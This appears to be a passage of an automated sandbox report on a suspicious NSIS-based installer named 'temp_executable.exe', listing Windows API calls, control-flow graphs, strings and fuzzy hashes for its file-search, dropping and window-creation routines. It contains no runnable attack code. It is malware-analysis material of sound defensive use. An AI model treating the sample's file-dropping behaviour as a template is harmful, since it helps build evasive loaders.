                                  • Part of subcall function 00406613: lstrlenW.KERNEL32(00425A48,00000000,00425A48,00425A48,00000000,?,?,00406716,?,00000000,76073420,?), ref: 00406667
                                  • Part of subcall function 00406613: GetFileAttributesW.KERNEL32(00425A48,00425A48), ref: 00406678
                                • DeleteFileW.KERNELBASE(?,?,00000000,76073420,?), ref: 00406720
                                • lstrcatW.KERNEL32(00425248,\*.*,00425248,?,00000000,?,00000000,76073420,?), ref: 00406772
                                • lstrcatW.KERNEL32(?,004082B0,?,00425248,?,00000000,?,00000000,76073420,?), ref: 00406793
                                • lstrlenW.KERNEL32(?), ref: 00406796
                                • FindFirstFileW.KERNEL32(00425248,?), ref: 004067AD
                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?), ref: 0040683E
                                • FindClose.KERNEL32(00000000), ref: 00406850
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                • String ID: \*.*
                                • API String ID: 2636146433-1173974218
                                • Opcode ID: 0962212a27e10f8c29849c35d287c52ef14dcf59cdd65fcf28beb03e610e8e2c
                                • Instruction ID: ed3bb2814488eceec14de134e67e78f5f853c3bf88eed2e9a0dc8686b927a400
                                • Opcode Fuzzy Hash: 0962212a27e10f8c29849c35d287c52ef14dcf59cdd65fcf28beb03e610e8e2c
                                • Instruction Fuzzy Hash: E841193210671069D7207B399D45A6B76E8DF81318F12453FF883B21D1EB7C8C6686AF
                                APIs
                                • FindFirstFileW.KERNELBASE(00000000,00427648,00000000,00406657,00425A48), ref: 004065B5
                                • FindClose.KERNEL32(00000000), ref: 004065C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Find$CloseFileFirst
                                • String ID: HvB
                                • API String ID: 2295610775-1619000230
                                • Opcode ID: 1a79fd4cd6ac794e938e769cbdac9cc28720eba36b1ba893e73712489ff4ef95
                                • Instruction ID: d1368554cb410e246732b21b307163ecdbcfd804cd616700c419d461b784c5b9
                                • Opcode Fuzzy Hash: 1a79fd4cd6ac794e938e769cbdac9cc28720eba36b1ba893e73712489ff4ef95
                                • Instruction Fuzzy Hash: 72D0123155A1206FC25057387E0C84B7A999F153717518B36B0A6F11E4C7348C6686AD

                                Control-flow Graph

                                control_flow_graph 146 405a19-405a34 call 4068c1 149 405a36-405a46 call 4065fa 146->149 150 405a48-405a7e call 406952 146->150 159 405aa1-405aca call 40595a call 406613 149->159 155 405a80-405a91 call 406952 150->155 156 405a96-405a9c lstrcatW 150->156 155->156 156->159 164 405ad0-405ad5 159->164 165 405b62-405b6a call 406613 159->165 164->165 166 405adb-405b04 call 406952 164->166 171 405b78-405ba6 LoadImageW 165->171 172 405b6c-405b73 call 405e95 165->172 166->165 173 405b06-405b0c 166->173 175 405c25-405c2d call 401533 171->175 176 405ba8-405bd3 RegisterClassW 171->176 172->171 177 405b0e-405b1c call 4065d1 173->177 178 405b1f-405b2d lstrlenW 173->178 189 405c33-405c3e call 40595a 175->189 190 405cdf-405ce1 175->190 179 405bd5-405bd7 176->179 180 405bdc-405c20 SystemParametersInfoW CreateWindowExW 176->180 177->178 183 405b55-405b5d call 406531 call 406af5 178->183 184 405b2f-405b3d lstrcmpiW 178->184 185 405ce2-405ce9 179->185 180->175 183->165 184->183 188 405b3f-405b49 GetFileAttributesW 184->188 193 405b4b-405b4d 188->193 194 405b4f-405b50 call 406ceb 188->194 199 405c44-405c5e ShowWindow call 406179 189->199 200 405cc6-405cce call 40583f 189->200 190->185 193->183 193->194 194->183 207 405c60-405c65 call 406179 199->207 208 405c6a-405c7b GetClassInfoW 199->208 205 405cd0-405cd6 200->205 206 405cea-405cec call 401533 200->206 205->190 209 405cd8-405cda call 401533 205->209 215 405cf1 206->215 207->208 212 405c93-405cc4 DialogBoxParamW call 401533 call 403cd3 208->212 213 405c7d-405c91 GetClassInfoW RegisterClassW 208->213 209->190 212->185 213->212 215->215
                                APIs
                                  • Part of subcall function 004068C1: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000B), ref: 004068CF
                                  • Part of subcall function 004068C1: GetProcAddress.KERNEL32(00000000), ref: 004068EB
                                • lstrcatW.KERNEL32(1033,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000,00000002,00000000,76073420,00000000,76073170), ref: 00405A9C
                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising,1033,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000,00000002,00000000), ref: 00405B20
                                • lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising,1033,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000), ref: 00405B35
                                • GetFileAttributesW.KERNEL32(Call), ref: 00405B40
                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising), ref: 00405B89
                                  • Part of subcall function 004065FA: wsprintfW.USER32 ref: 00406607
                                • RegisterClassW.USER32(00428CA0), ref: 00405BCE
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405BE5
                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C1A
                                • ShowWindow.USER32(00000005,00000000), ref: 00405C4C
                                • GetClassInfoW.USER32(00000000,RichEdit20W,00428CA0), ref: 00405C77
                                • GetClassInfoW.USER32(00000000,RichEdit,00428CA0), ref: 00405C84
                                • RegisterClassW.USER32(00428CA0), ref: 00405C91
                                • DialogBoxParamW.USER32(?,00000000,00404F6D,00000000), ref: 00405CAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                • API String ID: 1975747703-2089972381
                                • Opcode ID: 7826c34372ab1de799e47c1a445c5beb8b4d289113b4383a7413856266521f1e
                                • Instruction ID: 997547c739dba09290e01480a6769471c967da196cfb38af9b733d4135fa1862
                                • Opcode Fuzzy Hash: 7826c34372ab1de799e47c1a445c5beb8b4d289113b4383a7413856266521f1e
                                • Instruction Fuzzy Hash: 1A610370201601BAE620AB76AD42F2B366CEB04758F51443FF945B62E1DF78AC018B7D

                                Control-flow Graph

                                control_flow_graph 220 40154a-4015bd 221 402ea1 220->221 222 4015c3-4015c7 220->222 242 402ea5 221->242 223 4016c1-4016cf 222->223 224 4017c2-401e9e call 40303e call 4065aa 222->224 225 401684-4016aa 222->225 226 4015e6-4015ee 222->226 227 4018cb-4018d4 call 40303e call 406a31 222->227 228 40160c-40160d 222->228 229 4015ce-4015d0 222->229 230 4016ef-4016fb call 40303e SetFileAttributesW 222->230 231 4016af-4016bc call 4065fa 222->231 232 40182f-40184b call 40303e GetFullPathNameW 222->232 233 401711-401728 call 40303e call 406ba0 222->233 234 401633-40163a SetForegroundWindow 222->234 235 4017d3-4017f6 call 40303e * 3 MoveFileW 222->235 236 4015d5-4015d6 222->236 237 401618-40162e call 403002 Sleep 222->237 238 4015f9-401602 call 4030fd call 401399 222->238 239 40189b-4018b8 call 40303e SearchPathW 222->239 240 4018de-401904 call 40303e call 406dde 222->240 241 40163f-401645 222->241 255 4016d1-4016d5 ShowWindow 223->255 256 4016d9-4016e0 223->256 312 401bb2-401bb6 224->312 313 401ea4-401ea8 224->313 253 402ead-402eb7 225->253 259 4015f0-4015f7 PostQuitMessage 226->259 260 4015dc-4015e1 226->260 296 4018d9 227->296 246 40160e-401613 call 405d15 228->246 229->253 291 401701-401703 230->291 231->221 289 401857-40185d 232->289 290 40184d-401855 232->290 304 401784-40178e 233->304 305 40172a-40173f call 4065d1 233->305 234->221 321 401804-401808 235->321 322 4017f8-4017ff 235->322 257 4015d7 call 405d15 236->257 237->221 294 401607 238->294 239->221 283 4018be-4018c6 239->283 307 401906-40190c call 406af5 240->307 308 40190e-401920 call 406af5 call 406531 lstrcatW 240->308 250 401671-40167f 241->250 251 401647 241->251 247 402eab 242->247 246->221 247->253 272 401657-40166c call 403002 251->272 273 401649-401650 251->273 255->256 256->221 276 4016e6-4016ea ShowWindow 256->276 257->260 259->260 260->253 272->221 273->272 276->221 283->242 300 40187b 289->300 301 40185f-401862 289->301 299 40187f-401883 290->299 291->221 302 401709-40170c 291->302 294->253 296->291 299->242 310 401889-401896 GetShortPathNameW 299->310 300->299 301->300 309 401864-40186c call 4065aa 301->309 302->242 317 401790-4017ab call 405d15 call 406af5 SetCurrentDirectoryW 304->317 318 4017bb-4017bd 304->318 327 401741-401745 305->327 328 401758-401759 call 405df9 305->328 330 401925-40192d call 406d18 307->330 308->330 309->290 333 40186e-401876 call 406af5 309->333 310->242 312->253 313->253 317->221 351 4017b1-4017b6 317->351 318->246 321->302 329 40180e-401816 call 4065aa 321->329 322->246 327->328 334 401747-40174e call 4064d7 327->334 343 40175e-401760 328->343 329->302 347 40181c-40182a call 406218 329->347 350 40192e-401931 330->350 333->300 334->328 352 401750-401756 call 405e19 334->352 348 401762-401767 343->348 349 401775-40177e 343->349 347->246 354 401774 348->354 355 401769-401772 GetFileAttributesW 348->355 349->305 356 401780 349->356 357 401933-40193d call 4065aa 350->357 358 401964-401966 350->358 351->221 352->343 354->349 355->349 355->354 356->304 369 401950-401960 357->369 370 40193f-40194e CompareFileTime 357->370 362 401968-401969 call 406b78 358->362 363 40196e-401989 call 4068f6 358->363 362->363 371 401a18-401a49 call 405d15 call 403148 363->371 372 40198f-401991 363->372 369->358 370->369 385 401a52-401a5a SetFileTime 371->385 386 401a4b-401a50 371->386 373 401993-4019df call 406af5 * 2 call 405e95 call 406af5 call 406a83 372->373 374 4019fd-401a13 call 405d15 372->374 373->350 403 4019e5-4019e8 373->403 374->242 388 401a60-401a6d CloseHandle 385->388 386->385 386->388 388->221 390 401a73-401a76 388->390 392 401a78-401a87 call 405e95 lstrcatW 390->392 393 401a89-401a8c call 405e95 390->393 398 401a91-401a9c call 406a83 392->398 393->398 398->260 398->312 404 4019f2-4019f8 403->404 405 4019ea-4019ed 403->405 404->247 405->257
                                APIs
                                • PostQuitMessage.USER32(00000000), ref: 004015F1
                                • Sleep.KERNELBASE(00000001,?,00000000,00000000), ref: 00401628
                                • SetForegroundWindow.USER32 ref: 00401634
                                • ShowWindow.USER32(00000000,00000000,?,?,00000000,00000000), ref: 004016D3
                                • ShowWindow.USER32(00000000,?,?,?,00000000,00000000), ref: 004016E8
                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
                                • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
                                • SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll), ref: 004017A3
                                • MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
                                • GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
                                • GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
                                • SearchPathW.KERNELBASE(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
                                • CompareFileTime.KERNEL32(-00000014,00000000,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
                                • SetFileTime.KERNELBASE(00000000,000000FF,00000000,000000FF,?,00000000,00000000,00000000,000000EA,00000000,Call,40000000,00000001,Call,00000000), ref: 00401A5A
                                • CloseHandle.KERNELBASE(00000000), ref: 00401A61
                                • lstrcatW.KERNEL32(Call,00000000,Call,000000E9), ref: 00401A82
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                • String ID: C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic$C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp$C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll$Call
                                • API String ID: 3895412863-3996529617
                                • Opcode ID: 238787bc3330ffadc63c006c1272a0d69737eff9e1560c5150495ef8301945b7
                                • Instruction ID: ebeff723cfbe9b45e3b0b0a6f17a4e6c0cbf30734010ce9bbeaf93aeca8f714e
                                • Opcode Fuzzy Hash: 238787bc3330ffadc63c006c1272a0d69737eff9e1560c5150495ef8301945b7
                                • Instruction Fuzzy Hash: 93D1F971614301ABC720BF26CD85D2B76A8EF85758F10463FF452B22E1DB7CD8029A6E

                                Control-flow Graph

                                control_flow_graph 406 4033c8-403415 GetTickCount GetModuleFileNameW call 4068f6 409 403421-403451 call 406af5 call 406ceb call 406af5 GetFileSize 406->409 410 403417-40341c 406->410 418 403457 409->418 419 40354d-40355c call 403364 409->419 411 403620-403627 410->411 421 40345b-403481 call 40311b 418->421 424 403562-403564 419->424 425 40361b 419->425 429 403613-40361a call 403364 421->429 430 403487-40348e 421->430 427 403595-4035c5 GlobalAlloc call 403131 call 403148 424->427 428 403566-403585 call 403131 call 406923 424->428 425->411 427->425 454 4035c7-4035d9 427->454 428->425 456 40358b-40358f 428->456 429->425 434 403490-4034a9 call 40668f 430->434 435 40350f-403512 430->435 438 40351c-403522 434->438 453 4034ab-4034b3 434->453 437 403514-40351b call 403364 435->437 435->438 437->438 444 403524-403533 call 406e17 438->444 445 403537-40353f 438->445 444->445 445->421 448 403545-403549 445->448 448->419 453->438 455 4034b5-4034bd 453->455 458 4035e1-4035e4 454->458 459 4035db 454->459 455->438 460 4034bf-4034c7 455->460 456->425 456->427 462 4035e7-4035ef 458->462 459->458 460->438 461 4034c9-4034d1 460->461 461->438 463 4034d3-4034f2 461->463 462->462 464 4035f1-40360a SetFilePointer call 40668f 462->464 463->425 465 4034f8-4034fe 463->465 468 40360f-403611 464->468 465->448 467 403500-403509 465->467 467->438 469 40350b-40350d 467->469 468->411 469->438
                                APIs
                                • GetTickCount.KERNEL32 ref: 004033DB
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\temp_executable.exe,00000400,?,?,?,?,?), ref: 004033F7
                                  • Part of subcall function 004068F6: GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\AppData\Local\Temp\temp_executable.exe,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                  • Part of subcall function 004068F6: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\temp_executable.exe,C:\Users\user\AppData\Local\Temp\temp_executable.exe,80000000,00000003,?,?,?,?,?), ref: 00403441
                                • GlobalAlloc.KERNELBASE(00000040,?,?,?,?,?,?), ref: 0040359B
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\temp_executable.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                • API String ID: 2803837635-3442550413
                                • Opcode ID: af579b943b1a820c08da397bdaa69b1d5dd35135494c3e1d3694e7b1604b832a
                                • Instruction ID: a22a3d629960f4d7b6f8438a3768dc05bd31f949a9b5a180d7de35419ae1bb07
                                • Opcode Fuzzy Hash: af579b943b1a820c08da397bdaa69b1d5dd35135494c3e1d3694e7b1604b832a
                                • Instruction Fuzzy Hash: 2B51EE71640300AFD720AF21DD81B1B7AA8AB88719F10493FF985772E1C7398E458B6E

                                Control-flow Graph

                                control_flow_graph 470 405e95-405e9e 471 405ea0-405eaf 470->471 472 405eb1-405ecc 470->472 471->472 473 405ee3-405eea 472->473 474 405ece-405ed9 472->474 476 405ef0-405ef3 473->476 477 4060de-4060e5 473->477 474->473 475 405edb-405edf 474->475 475->473 478 405ef4-405f02 476->478 479 4060f0 477->479 480 4060e7-4060ee call 406af5 477->480 482 405f08-405f13 478->482 483 4060d9-4060dd 478->483 481 4060f2-4060f8 479->481 480->481 485 4060b2 482->485 486 405f19-405f5d 482->486 483->477 488 4060c0 485->488 489 4060b4-4060be 485->489 490 405f63-405f74 486->490 491 40605d-406060 486->491 492 4060c3 488->492 489->492 495 405fb4-405fb7 490->495 496 405f76-405f94 call 406952 490->496 493 406062-406065 491->493 494 406096-406099 491->494 503 4060c5-4060d3 492->503 501 406075-40608c call 406af5 493->501 502 406067-406073 call 4065fa 493->502 497 4060a4-4060b0 lstrlenW 494->497 498 40609b-40609f call 405e95 494->498 499 405fc7-405fca 495->499 500 405fb9-405fc5 GetSystemDirectoryW 495->500 505 405f99-405fa2 496->505 497->503 498->497 508 405fda-405fe2 499->508 509 405fcc-405fd8 GetWindowsDirectoryW 499->509 507 406035 500->507 501->497 523 40608e-406094 call 406d18 501->523 502->497 503->478 503->483 512 406039-40603e 505->512 513 405fa8-405faf call 405e95 505->513 507->512 514 405fe4-405fed 508->514 515 405ff9-40600f SHGetSpecialFolderLocation 508->515 509->507 518 406040-406043 512->518 519 406051-40605b call 406d18 512->519 513->512 527 405ff5-405ff7 514->527 521 406011-40602a SHGetPathFromIDListW CoTaskMemFree 515->521 522 40602c-406033 515->522 518->519 524 406045-40604b lstrcatW 518->524 519->497 521->507 521->522 522->507 522->508 523->497 524->519 527->507 527->515
                                APIs
                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FBF
                                  • Part of subcall function 00406AF5: lstrcpynW.KERNEL32(?,?,00000400,0040384C,Sortkridts Setup,NSIS Error), ref: 00406B02
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406D8D
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406DA1
                                  • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406DB9
                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00424200,?,00000000,?,?,?,00000000,?,?), ref: 00405FD2
                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,00000000,?,?,?,00000000,?,?), ref: 0040604B
                                • lstrlenW.KERNEL32(Call,00424200,?,00000000,?,?,?,00000000,?,?), ref: 004060A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                • API String ID: 4187626192-1230650788
                                • Opcode ID: e881fb0b28361bdc3f8f7ae5213684426e418320bb2e4e194c901d83aeea876e
                                • Instruction ID: 94fe74e46bfd99ff5e6600c27bcf33d7150fb5fb58e2d65541bf0035bd99d3a3
                                • Opcode Fuzzy Hash: e881fb0b28361bdc3f8f7ae5213684426e418320bb2e4e194c901d83aeea876e
                                • Instruction Fuzzy Hash: 0F61E5312442159BDB20AB288D40A3B77A4EF58750F11443FF986F72D1DB7CD9219BAE

                                Control-flow Graph

                                control_flow_graph 595 40291d-402934 call 403002 598 402ea1-402ea5 595->598 599 40293a-40294b 595->599 603 402eab-402eb7 598->603 601 402951-402965 call 406c00 599->601 602 402aa2-402aac 599->602 601->602 608 40296b-402973 601->608 606 402ab5-402aba 602->606 609 402ad3-402ae2 SetFilePointer 606->609 610 402abc-402ac1 606->610 611 402975-40297a 608->611 609->602 612 402ac3-402ac6 610->612 613 402ac8-402ad1 610->613 614 402980-40299c ReadFile 611->614 615 402a33-402a37 611->615 612->609 612->613 613->602 614->602 616 4029a2-4029ac 614->616 617 402a39-402a3b 615->617 618 402a4c-402a5b call 406923 615->618 616->602 620 4029b2-4029bf 616->620 617->618 621 402a3d-402a46 call 40645f 617->621 618->602 627 402a5d-402a61 618->627 623 402ae4-402aee call 4065fa 620->623 624 4029c5-4029dc MultiByteToWideChar 620->624 621->602 633 402a48 621->633 623->598 623->603 624->627 628 4029de-4029e4 624->628 631 402a65-402a69 627->631 632 4029e6-4029f4 628->632 631->623 634 402a6b-402a76 631->634 632->631 635 4029f6-402a2f SetFilePointer MultiByteToWideChar 632->635 633->618 634->606 636 402a78-402a7d 634->636 635->632 637 402a31 635->637 636->606 638 402a7f-402a92 636->638 637->627 638->602 639 402a94-402a9c 638->639 639->602 639->611
                                APIs
                                • ReadFile.KERNELBASE(00000000,?,?,?), ref: 00402994
                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004029D4
                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A07
